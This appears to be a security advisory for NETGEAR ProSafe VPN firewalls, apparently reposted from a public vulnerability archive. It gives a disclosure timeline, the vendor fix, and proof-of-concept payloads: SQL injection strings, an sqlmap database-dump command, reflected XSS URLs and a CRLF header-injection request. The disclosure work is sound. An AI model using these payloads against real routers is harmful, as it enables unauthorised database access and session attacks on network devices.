what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

NETGEAR ProSafe Cross Site Scripting / SQL Injection / Header Injection

NETGEAR ProSafe Cross Site Scripting / SQL Injection / Header Injection
Posted Jun 26, 2015
Authored by Juan J. Guelfo

NETGEAR ProSafe suffers from cross site scripting, header injection, and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection
SHA-256 | d2cffb6c14ae7d6d75847a649433d54664550130dd5ffabcc160493696e70230

NETGEAR ProSafe Cross Site Scripting / SQL Injection / Header Injection

Change Mirror Download
About Encripto AS
=================

Encripto is a Norwegian company which provides specialized services within IT-security.
Our core expertise is security testing, network security monitoring and training.
Encripto is committed to information security. We do research to discover trends, new vulnerabilities and better ways to mitigate them.
We believe in acting as good internet citizens to the industry, whether you are a provider or a user.
You can read more about us at http://www.encripto.no



Timeline and revision history
=============================

- 25th of June 2015

The vendor releases firmware version 4.3.3-5, which fixes the vulnerabilities.
Public disclosure of the security advisory.


- 3rd of April 2015

The vendor confirms the presence of the vulnerabilities and provides a provisional list with vulnerable products and firmware versions.


- 31st of March 2015

New attempt to contact the vendor is made.
The vendor acknowledges the case and proceeds to verify the findings.


- 20th of March 2015

New vulnerabilities were discovered. Advisory update.


- 19th of March 2015

Vulnerabilities discovered by the researcher and details shared with the vendor.



Disclaimer
==========

The material presented in this document is for educational purposes only.
Encripto AS cannot be responsible for any loss or damage carried out by any technique presented in this material.
The reader is the only one responsible for applying this knowledge, which is at his / her own risk.
Any of the trademarks, service marks, collective marks, design rights, personality rights or similar rights that are mentioned, used or cited in this document is property of their respective owners.



License
=======

This document is licensed under the terms of the Creative Commons Attribution ShareAlike 3.0 license.
More information about this license can be found at http://creativecommons.org/licenses/by-sa/3.0/



Background
==========

According to the vendor, NETGEAR® ProSafe® business-class VPN Firewalls are high performing routers that provide full secure network access between headquarter locations, remote/branch offices and remote workers.



Summary
=======

Multiple NETGEAR® ProSafe® routers, running firmware version 4.3.2-7 and 4.3.3-3, are affected by SQL and HTTP header injection, and multiple Reflected Cross-Site Scripting vulnerabilities.



Affected Products
=================

The following table gathers the list of vulnerable products with their respective firmware versions.


NETGEAR® ProSafe® SRX5308 v4.3.2-7 and v4.3.3-3
NETGEAR® ProSafe® FVS336Gv3 v4.3.2-7 and v4.3.3-3
NETGEAR® ProSafe® FVS336Gv2 v4.3.2-7 and v4.3.3-3
NETGEAR® ProSafe® FVS318N v4.3.2-7 and v4.3.3-3

Previous versions of the firmware could also be affected, but this has not been verified.



Vulnerabilities and Proof of Concept (PoC)
==========================================

The following PoCs will assume that the vulnerable device is using a standard configuration, and it can be found at https://192.168.1.1


- SQL injection vulnerability
---------------------------

The parameter “portal” of the SSL VPN web application is affected by SQL injection. This could allow an attacker to interact with the Sqlite database supporting the device.

Sending the following payloads as portal values resulted in different responses:


SSL-VPN47034719'%20or%20'5358'%3d'5358

SSL-VPN47034719'%20or%20'5358'%3d'5359


The vulnerability could be exploited with automated tools, such as SQLmap.
The following GET request may be used as a base.

GET /scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive


Command example:

python sqlmap.py -r sqli.txt -p portal --threads 5 --dump --force-ssl --dbms=sqlite

[…OUTPUT SUPPRESSED…]

[13:51:01] [INFO] GET parameter 'portal' seems to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="NETGEAR ProSafe™ - SSL-VPN")

[…OUTPUT SUPPRESSED…]

GET parameter 'portal' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection points with a total of 39 HTTP(s) requests:
---
Parameter: portal (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: page=portalLogin.htm&portal=SSL-VPN' AND 7037=7037 AND 'iBib'='iBib
---
[13:51:12] [INFO] the back-end DBMS is SQLite
back-end DBMS: SQLite



As an example, the database structure and its contents could be retrieved.

Database: SQLite_masterdb
[238 tables]
+-------------------------------------+
| AlgConf |
| AttackChecks |
| AttackChecks6 |
| AvailableLanHost |
| BandWidthProfile |
| BandWidthProfileSpeed |
| BandWidthProfileStatus |
| BlockSites |
| BwMonStat |

[…OUTPUT SUPPRESSED…]



In addition to the “portal” parameter, the “USERDBDomains.Domainname” and “USERDBUsers.UserName” of the “/scgi-bin/platform.cgi” page presented a similar behavior.



- Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities
-------------------------------------------------------------

The “portal”, “Login.PortalName” and “stuMsg” parameters of the SSL VPN web application are affected by Reflected XSS.
The “Login.PortalName” is originally a POST parameter that can be provided via GET as well.

The following links should document the case. A simple JavaScript payload has been used in these examples:

https://192.168.1.1/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN"><script>alert("XSS")</script>
https://192.168.1.1/scgi-bin/platform.cgi?thispage=portalLogin.htm&Login.PortalName=SSL-VPN"><script>alert("XSS")<%2fscript>&USERDBUsers.UserName=test&USERDBUsers.Password=test&USERDBDomains.Domainname=geardomain&button.login.router_status=Login&Login.userAgent=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A31.0%29+Gecko%2F20100101+Firefox%2F31.0+Iceweasel%2F31.5.0
https://192.168.1.1/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN&stuMsg=Usereb<script>alert("XSS")<%2fscript>



- HTTP header injection vulnerability
-----------------------------------

The “Login.PortalName” of the SSL VPN web application is affected by HTTP header injection.
This could be leveraged by an attacker in order to split HTTP responses or inject new headers.

The following request demonstrates the issue when submitting the payload in a GET request. The same results could be achieved with a POST request.

GET /scgi-bin/platform.cgi?thispage=portalLogin.htm&Login.PortalName=c9b54%0d%New-header:+8897%0d%0a&USERDBUsers.UserName=test&USERDBUsers.Password=test&USERDBDomains.Domainname=geardomain&button.login.router_status=Login&Login.userAgent=Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A31.0%29+Gecko%2F20100101+Firefox%2F31.0+Iceweasel%2F31.5.0 HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0 Iceweasel/31.5.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: https://192.168.1.1/scgi-bin/platform.cgi?page=portalLogin.htm&portal=SSL-VPN
Connection: keep-alive

HTTP/1.0 302 Moved Temporarily
Date: Thu, 31 Jan 2013 06:31:50 GMT
Server: Embedded HTTP Server.
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Location: https://192.168.1.1:443/scgi-bin/platform.cgi?page=portalLogin.htm&portal=c9b54
New-header: 8897
&stuMsg=SSLVPN User authentication Failed. Use the correct SSL portal URL to login.



Remediation
===========

The vendor has released firmware version 4.3.3-5, which fixes the issues.
Encripto encourages product owners to upgrade to this version as soon as possible.



Credit
======

The vulnerabilities were discovered by Juan J. Güelfo at Encripto AS.
E-mail: post@encripto.no
Web: http://www.encripto.no

For more information about Encripto’s research policy, please visit http://www.encripto.no/forskning/



References
==========

http://www.encripto.no/forskning/whitepapers/Netgear_prosafe_advisory_june_2015.pdf



Special Thanks
==============

Special thanks to Maarten Hoogcarspel from the Netgear support team for his quick response and professional case handling.
Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close